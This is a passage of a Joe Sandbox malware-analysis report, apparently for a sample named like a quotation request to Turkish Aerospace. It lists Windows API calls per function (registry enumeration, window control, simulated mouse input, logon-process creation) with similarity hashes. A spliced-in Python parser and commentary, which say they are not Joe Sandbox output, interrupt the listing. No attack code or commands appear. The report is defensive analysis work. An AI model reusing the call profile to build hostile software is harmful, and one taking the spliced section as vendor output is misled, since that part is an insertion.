                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 01027632
                                                                                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0102763F
                                                                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0102764A
                                                                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 01027659
                                                                                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 01027665
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                    • String ID: Msctls_Progress32
                                                                                                                                    • API String ID: 1025951953-3636473452
                                                                                                                                    • Opcode ID: af596ec0d20bacf68e760ba9de4db96d817c00f554102dcb92c7e3cb5ae47068
                                                                                                                                    • Instruction ID: 258b1657aef3fd019504b4574eb3f18b552b0a85395112dc721080bcd1c60927
                                                                                                                                    • Opcode Fuzzy Hash: af596ec0d20bacf68e760ba9de4db96d817c00f554102dcb92c7e3cb5ae47068
                                                                                                                                    • Instruction Fuzzy Hash: D11193B111012ABFEF258E64CC85EE7BF6DEF08798F014114FA44A6050C6729C21DBA4
                                                                                                                                    APIs
                                                                                                                                    • __init_pointers.LIBCMT ref: 00FC9AE6
                                                                                                                                      • Part of subcall function 00FC3187: EncodePointer.KERNEL32(00000000), ref: 00FC318A
                                                                                                                                      • Part of subcall function 00FC3187: __initp_misc_winsig.LIBCMT ref: 00FC31A5
                                                                                                                                      • Part of subcall function 00FC3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00FC9EA0
                                                                                                                                      • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00FC9EB4
                                                                                                                                      • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00FC9EC7
                                                                                                                                      • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00FC9EDA
                                                                                                                                      • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00FC9EED
                                                                                                                                      • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00FC9F00
                                                                                                                                      • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00FC9F13
                                                                                                                                      • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00FC9F26
                                                                                                                                      • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00FC9F39
                                                                                                                                      • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00FC9F4C
                                                                                                                                      • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00FC9F5F
                                                                                                                                      • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00FC9F72
                                                                                                                                      • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00FC9F85
                                                                                                                                      • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00FC9F98
                                                                                                                                      • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00FC9FAB
                                                                                                                                      • Part of subcall function 00FC3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00FC9FBE
                                                                                                                                    • __mtinitlocks.LIBCMT ref: 00FC9AEB
                                                                                                                                    • __mtterm.LIBCMT ref: 00FC9AF4
                                                                                                                                      • Part of subcall function 00FC9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00FC9AF9,00FC7CD0,0105A0B8,00000014), ref: 00FC9C56
                                                                                                                                      • Part of subcall function 00FC9B5C: _free.LIBCMT ref: 00FC9C5D
                                                                                                                                      • Part of subcall function 00FC9B5C: DeleteCriticalSection.KERNEL32(0105EC00,?,?,00FC9AF9,00FC7CD0,0105A0B8,00000014), ref: 00FC9C7F
                                                                                                                                    • __calloc_crt.LIBCMT ref: 00FC9B19
                                                                                                                                    • __initptd.LIBCMT ref: 00FC9B3B
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00FC9B42
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3567560977-0
                                                                                                                                    • Opcode ID: 19507a288ad31386a679fd52407f2a54589442eaf90ef81f7a9f3ebb664dbaee
                                                                                                                                    • Instruction ID: e5301339d7c1a4a54dc5c0d84ffb0a2ad38c256bf3a9407d393d05aa4dfd9f86
                                                                                                                                    • Opcode Fuzzy Hash: 19507a288ad31386a679fd52407f2a54589442eaf90ef81f7a9f3ebb664dbaee
                                                                                                                                    • Instruction Fuzzy Hash: A2F0C23290D31329E7347A74BE0BF4A36909F42770B20061EF094950C2EE999A0125A0
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00FC3F85), ref: 00FC4085
                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00FC408C
                                                                                                                                    • EncodePointer.KERNEL32(00000000), ref: 00FC4097
                                                                                                                                    • DecodePointer.KERNEL32(00FC3F85), ref: 00FC40B2
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                    • String ID: RoUninitialize$combase.dll
                                                                                                                                    • API String ID: 3489934621-2819208100
                                                                                                                                    • Opcode ID: 32ed7f034c7429088347b5cebd60d0518fbf9b876bec63329a514732cff8566d
                                                                                                                                    • Instruction ID: 0aebefceb2c16af2d5b602e3f00290f836a4859c45b619b2e4bb881455c20f9f
                                                                                                                                    • Opcode Fuzzy Hash: 32ed7f034c7429088347b5cebd60d0518fbf9b876bec63329a514732cff8566d
                                                                                                                                    • Instruction Fuzzy Hash: 53E09270981202EBEA30AF61EA0EB053AB8B705B92F204018F986ED098CBBB5504DB54
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memmove$__itow__swprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3253778849-0
                                                                                                                                    • Opcode ID: 21c363d6d5c09a7a42dfc03ef52fd438f6cd54c5821b196d12bfcbf1ca2abfab
                                                                                                                                    • Instruction ID: 0f0234533335a57dbc326ad9f8133a926bb2c163b275252000c0cd977e86ec70
                                                                                                                                    • Opcode Fuzzy Hash: 21c363d6d5c09a7a42dfc03ef52fd438f6cd54c5821b196d12bfcbf1ca2abfab
                                                                                                                                    • Instruction Fuzzy Hash: 3F61CF7050024A9BDF02EF64CC82EFF3BA5AF0A308F044469F9955B1D2DB79D916DB50
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                                                                                      • Part of subcall function 01020E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0101FDAD,?,?), ref: 01020E31
                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 010202BD
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 010202FD
                                                                                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 01020320
                                                                                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 01020349
                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0102038C
                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 01020399
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4046560759-0
                                                                                                                                    • Opcode ID: efb418e959f2c24b80ce309a98813be1f9ca5d3f371f7181aa1fa34c9a3755fa
                                                                                                                                    • Instruction ID: 17931b4555c1dedf5b667de9c7502c10ff964a3658a7219a8a9c23d8fe2e5da5
                                                                                                                                    • Opcode Fuzzy Hash: efb418e959f2c24b80ce309a98813be1f9ca5d3f371f7181aa1fa34c9a3755fa
                                                                                                                                    • Instruction Fuzzy Hash: 9F515571208305AFD710EF28C885EAFBBE8EF89314F04491DF5858B2A1DB75E909DB52
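The records above follow one layout throughout the report: an "APIs" header, one bulleted "Name.MODULE(args), ref: ADDR" line per call (lines prefixed "Part of subcall function" are calls attributed to a callee, not to the function itself), then a "Similarity" block whose API ID, String ID, API String ID and Opcode Fuzzy Hash fields are what let a function be matched against other reports. The parser below is an added example and not Joe Sandbox code; it turns that text into records so the listing can be filtered (for example, registry access versus MSVC runtime start-up in LIBCMT) rather than read by eye. Its sample input is constructed from three records on this page, with the CRT record shortened to its LIBCMT calls; the field names, the LIBCMT-only noise heuristic and the "Reg" prefix search are the example's own choices.

```python
"""Parse Joe Sandbox per-function API listings into structured records.

Added example (not Joe Sandbox code): reads the plain-text layout shown in
this report section so a long function listing can be filtered or diffed
against another report.
"""
import re
from collections import Counter

BULLET = "\u2022"

# Constructed sample input: three records taken from this page; the CRT
# record is shortened to its LIBCMT calls.
SAMPLE = """\
APIs
  • Part of subcall function 01020E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0101FDAD,?,?), ref: 01020E31
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 010202BD
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 010202FD
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 01020349
• RegCloseKey.ADVAPI32(00000000), ref: 01020399
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
• String ID:
• API String ID: 4046560759-0
• Opcode Fuzzy Hash: efb418e959f2c24b80ce309a98813be1f9ca5d3f371f7181aa1fa34c9a3755fa
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00FC3F85), ref: 00FC4085
• GetProcAddress.KERNEL32(00000000), ref: 00FC408C
• EncodePointer.KERNEL32(00000000), ref: 00FC4097
• DecodePointer.KERNEL32(00FC3F85), ref: 00FC40B2
Strings
Similarity
• API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
• String ID: RoUninitialize$combase.dll
• API String ID: 3489934621-2819208100
• Opcode Fuzzy Hash: 32ed7f034c7429088347b5cebd60d0518fbf9b876bec63329a514732cff8566d
APIs
• __init_pointers.LIBCMT ref: 00FC9AE6
• __mtinitlocks.LIBCMT ref: 00FC9AEB
• __calloc_crt.LIBCMT ref: 00FC9B19
Similarity
• Opcode Fuzzy Hash: 19507a288ad31386a679fd52407f2a54589442eaf90ef81f7a9f3ebb664dbaee
"""

# "Name.MODULE(args), ref: ADDR"; the parenthesised argument list is absent for LIBCMT internals.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
FIELD_RE = re.compile(
    r"^(?P<key>API ID|String ID|API String ID|Opcode Fuzzy Hash|Instruction Fuzzy Hash):\s*(?P<val>.*)$"
)


def _new_record():
    return {"apis": [], "api_id": "", "string_id": [], "api_string_id": "",
            "opcode_fuzzy_hash": "", "instruction_fuzzy_hash": ""}


def parse_listing(text):
    """Return one dict per function; a record starts at each 'APIs' header."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = _new_record()
            records.append(cur)
            continue
        if cur is None or not line.startswith(BULLET):
            continue  # other section headers, and anything before the first record
        body = line[len(BULLET):].strip()
        m = API_RE.match(body)
        if m:
            args = m.group("args")
            cur["apis"].append({
                "name": m.group("name"), "module": m.group("module"),
                "args": args.split(",") if args else [],
                "ref": m.group("ref"),
                "subcall": m.group("sub"),  # None when the function makes the call itself
            })
            continue
        f = FIELD_RE.match(body)
        if f:
            key = f.group("key").lower().replace(" ", "_")
            val = f.group("val").strip()
            if key == "string_id":
                cur[key] = val.split("$") if val else []  # '$'-joined; empty means no strings
            else:
                cur[key] = val
    return records


def direct_calls(record):
    """Calls made by the function itself, excluding those attributed to callees."""
    return [a for a in record["apis"] if a["subcall"] is None]


def module_histogram(records):
    """Count direct calls per module: a quick view of what the listing actually touches."""
    return Counter(a["module"] for r in records for a in direct_calls(r))


def is_crt_noise(record):
    """True when every direct call is a LIBCMT internal (runtime start-up, not sample logic)."""
    direct = direct_calls(record)
    return bool(direct) and all(a["module"] == "LIBCMT" for a in direct)


def find_calls(records, prefix):
    """(name, ref) of direct calls whose API name starts with prefix, e.g. 'Reg' for registry access."""
    return [(a["name"], a["ref"]) for r in records for a in direct_calls(r)
            if a["name"].startswith(prefix)]


if __name__ == "__main__":
    recs = parse_listing(SAMPLE)
    print(module_histogram(recs))
    print("registry:", find_calls(recs, "Reg"))
    print("crt noise:", [r["opcode_fuzzy_hash"][:12] for r in recs if is_crt_noise(r)])
```

Run it on the full listing (the report's text pasted into a file) to get a module histogram and a list of registry, window-message or credential-store calls with their code addresses; the opcode fuzzy hashes of the remaining records are the values worth comparing against a second report of a related sample.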
                                                                                                                                    APIs
                                                                                                                                    • GetMenu.USER32(?), ref: 010257FB
                                                                                                                                    • GetMenuItemCount.USER32(00000000), ref: 01025832
                                                                                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0102585A
                                                                                                                                    • GetMenuItemID.USER32(?,?), ref: 010258C9
                                                                                                                                    • GetSubMenu.USER32(?,?), ref: 010258D7
                                                                                                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 01025928
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: Menu$Item$CountMessagePostString
• String ID:
• API String ID: 650687236-0
• Opcode ID: 28628b537628f9b95c67806f7328c53ff5572a0d46b2c4148c086914bfabf5ff
• Instruction ID: eaa01e01b76b0f6e83b2c562c7df1506496437ab6b578fb1425cd1ce586ffe9c
• Opcode Fuzzy Hash: 28628b537628f9b95c67806f7328c53ff5572a0d46b2c4148c086914bfabf5ff
• Instruction Fuzzy Hash: A7517F71E00226AFCF11DF64CC45AEEBBB4EF49310F144099E981BB351CBB9AE419B94
APIs
• VariantInit.OLEAUT32(?), ref: 00FFEF06
• VariantClear.OLEAUT32(00000013), ref: 00FFEF78
• VariantClear.OLEAUT32(00000000), ref: 00FFEFD3
• _memmove.LIBCMT ref: 00FFEFFD
• VariantClear.OLEAUT32(?), ref: 00FFF04A
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00FFF078
Similarity
• API ID: Variant$Clear$ChangeInitType_memmove
• String ID:
• API String ID: 1101466143-0
• Opcode ID: e3c4fe555d601ac9e5627848f5c3e0e087bb44631d8c843c454289a0f9d45e4b
• Instruction ID: 87d22d2792bca9a2094b3918c53816edda0f0403a2904b3e1fab91cd4fb2ff44
• Opcode Fuzzy Hash: e3c4fe555d601ac9e5627848f5c3e0e087bb44631d8c843c454289a0f9d45e4b
• Instruction Fuzzy Hash: F7517CB5A00209DFCB20CF58C880AAAB7B8FF4C310B158569EA49DB315E735E911CBA0
APIs
• _memset.LIBCMT ref: 01002258
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 010022A3
• IsMenu.USER32(00000000), ref: 010022C3
• CreatePopupMenu.USER32 ref: 010022F7
• GetMenuItemCount.USER32(000000FF), ref: 01002355
• InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 01002386
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup_memset
• String ID:
• API String ID: 3311875123-0
• Opcode ID: bb6600a99827a38fbe9f0c609beb68b9c8f99dc0b1f96dae2dafa52c0f455812
• Instruction ID: 4dc2cd5bda5e28807e97de620888332255cf58a7cc0fd82af3f416b1c5ea58f1
• Opcode Fuzzy Hash: bb6600a99827a38fbe9f0c609beb68b9c8f99dc0b1f96dae2dafa52c0f455812
• Instruction Fuzzy Hash: B751AF7060020AEBEF22CF68C98CBADBBF5BF45314F148199E995A72D0D7719A44CB51
APIs
  • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
• BeginPaint.USER32(?,?,?,?,?,?), ref: 00FA179A
• GetWindowRect.USER32(?,?), ref: 00FA17FE
• ScreenToClient.USER32(?,?), ref: 00FA181B
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00FA182C
• EndPaint.USER32(?,?), ref: 00FA1876
Similarity
• API ID: PaintWindow$BeginClientLongRectScreenViewport
• String ID:
• API String ID: 1827037458-0
• Opcode ID: 794a652c1be4eed9cac80c5b53a398f3ef37c4e389cfc5193763259cf423001a
• Instruction ID: bd06df03ad9cf034f39e0041626ebb03ccd7d32214b402324ea3705535a54606
• Opcode Fuzzy Hash: 794a652c1be4eed9cac80c5b53a398f3ef37c4e389cfc5193763259cf423001a
• Instruction Fuzzy Hash: 7D41C1715043019FC720DF24CC84FBA7BF8FB4A764F180629F9A4872A1C7399805EB61
APIs
• ShowWindow.USER32(010657B0,00000000,011F5D60,?,?,010657B0,?,0102B5A8,?,?), ref: 0102B712
• EnableWindow.USER32(00000000,00000000), ref: 0102B736
• ShowWindow.USER32(010657B0,00000000,011F5D60,?,?,010657B0,?,0102B5A8,?,?), ref: 0102B796
• ShowWindow.USER32(00000000,00000004,?,0102B5A8,?,?), ref: 0102B7A8
• EnableWindow.USER32(00000000,00000001), ref: 0102B7CC
• SendMessageW.USER32(?,0000130C,?,00000000), ref: 0102B7EF
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID:
• API String ID: 642888154-0
• Opcode ID: 95555a5a9efc835106de393f430c87748b130c29fc45457202f527326cb95fbe
• Instruction ID: 9b73f1eebfcba89b60b9f78737948f5b889fbb004f8dc973f2bb7ebdc31a214d
• Opcode Fuzzy Hash: 95555a5a9efc835106de393f430c87748b130c29fc45457202f527326cb95fbe
• Instruction Fuzzy Hash: 33414D34600251AFEB66CF28C499B957FE1FF09350F1C41E9EAC88F6A2C732A456DB51
APIs
• GetForegroundWindow.USER32(?,?,?,?,?,?,01014E41,?,?,00000000,00000001), ref: 010170AC
  • Part of subcall function 010139A0: GetWindowRect.USER32(?,?), ref: 010139B3
• GetDesktopWindow.USER32 ref: 010170D6
• GetWindowRect.USER32(00000000), ref: 010170DD
• mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0101710F
  • Part of subcall function 01005244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 010052BC
• GetCursorPos.USER32(?), ref: 0101713B
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 01017199
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
• String ID:
• API String ID: 4137160315-0
• Opcode ID: e16013cae6069d576a07c69fee24e3673d641b8acdcdb44ce3409e324d66c642
• Instruction ID: 1888481d57e5138fbc74211255dcb0563f793fced078e0d644b18e1b5405e671
• Opcode Fuzzy Hash: e16013cae6069d576a07c69fee24e3673d641b8acdcdb44ce3409e324d66c642
• Instruction Fuzzy Hash: 1131B072505316ABD730DF18C848F9BBBEAFF88354F100919F5C597181CA79EA09CB92
APIs
  • Part of subcall function 00FF80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00FF80C0
  • Part of subcall function 00FF80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00FF80CA
  • Part of subcall function 00FF80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00FF80D9
  • Part of subcall function 00FF80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00FF80E0
  • Part of subcall function 00FF80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00FF80F6
• GetLengthSid.ADVAPI32(?,00000000,00FF842F), ref: 00FF88CA
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 00FF88D6
• HeapAlloc.KERNEL32(00000000), ref: 00FF88DD
• CopySid.ADVAPI32(00000000,00000000,?), ref: 00FF88F6
• GetProcessHeap.KERNEL32(00000000,00000000,00FF842F), ref: 00FF890A
• HeapFree.KERNEL32(00000000), ref: 00FF8911
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3008561057-0
                                                                                                                                    • Opcode ID: b90454d8b28ffd421c8faf405c634680127f5ac2c31fb4ef693e7385a11f7fce
                                                                                                                                    • Instruction ID: 3e7e1e884d5ba6b9d2b39a2f3e5f6e277a0c203ad6e8e5b40aef79066b1a751f
                                                                                                                                    • Opcode Fuzzy Hash: b90454d8b28ffd421c8faf405c634680127f5ac2c31fb4ef693e7385a11f7fce
                                                                                                                                    • Instruction Fuzzy Hash: CD11A231901209FFDB309FA4DC0ABBE7B78EF457A1F604018E98597210CB769901EB60
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00FF85E2
                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00FF85E9
                                                                                                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00FF85F8
                                                                                                                                    • CloseHandle.KERNEL32(00000004), ref: 00FF8603
                                                                                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00FF8632
                                                                                                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 00FF8646
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1413079979-0
                                                                                                                                    • Opcode ID: 0885bbbee9b3f22e1265910e694688765747b4d921b0119ad2bb1768b551a65a
                                                                                                                                    • Instruction ID: 1bca48068c8acd8246d98ca295b13a60b1801450f311f5be292fe41d5d36a248
                                                                                                                                    • Opcode Fuzzy Hash: 0885bbbee9b3f22e1265910e694688765747b4d921b0119ad2bb1768b551a65a
                                                                                                                                    • Instruction Fuzzy Hash: 0F11597250024EABDF218EA4DD49FEE7BB9EF08794F184055FE05E2160C7768D61EB60
                                                                                                                                    APIs
                                                                                                                                    • GetDC.USER32(00000000), ref: 00FFB7B5
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00FFB7C6
